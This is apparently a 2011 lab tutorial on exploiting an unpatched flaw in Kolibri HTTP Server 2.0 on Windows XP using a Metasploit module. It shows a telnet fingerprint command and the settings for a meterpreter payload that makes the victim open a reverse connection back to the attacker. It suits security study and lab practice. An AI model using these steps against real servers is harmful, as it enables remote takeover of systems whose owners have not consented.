Type : Tutorial
Level : Easy
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP3
Tested Vulnerable Application : Kolibri 2.0
Exploit Credit : mr_me, The_Leader
Another zeroday exploit found in Kolibri HTTP Web Server. Actually this exploit was written into metasploit framework module in 2011-08-03, but until now there's no fixation or update from the Kolibri developer.
1. Metasploit Framework
2. Kolibri HTTP Server 2.0(download below)
3. Kolibri HTTP exploit(download link)
Attacker IP address : 192.168.8.93
Victim IP address : 192.168.8.94
1. Download the kolibri_http.rb exploit from the link above and for testing purpose I've also included the link to download the vulnerable Kolibri web server 2.0 so you can try in your own lab.
Copy the kolibri_http.rb to following folder(I'm using backtrack 5 R1) :
2. To determine which type of server running, we can do a simple fingerprint by telneting to the remote host and specified port. In this case the victim kolibri HTTP server was run on port 8080, but the usual web server was run on port 80.
telnet 192.168.8.94 8080 ^ ^ remote ip address port
3. The next step let's prepare the exploit to exploiting the vulnerable kolibri web server by choosing the exploit we've already added in step 1. In this exploit I'm using meterpreter payload.
4. Set up the needed switch to perform our exploit. To view all the available switch for this exploit + payload just run show options command.
set rhost 192.168.8.94 --> determine the target ip address set rport 8080 --> determine the target port which run kolibri web server set lhost 192.168.8.93 --> our local ip address to receive reverse connection from victim set lport 443 --> local port to handle reverse connection from victim
5. When everything we've been set up correctly, now let's try to run the exploit by using exploit command and see it's successful or not.
1. Until now I'm wrote this tutorial 2011-10-21 Kolibri web server still no update a.k.a the exploit status still zeroday
Hope it's useful 🙂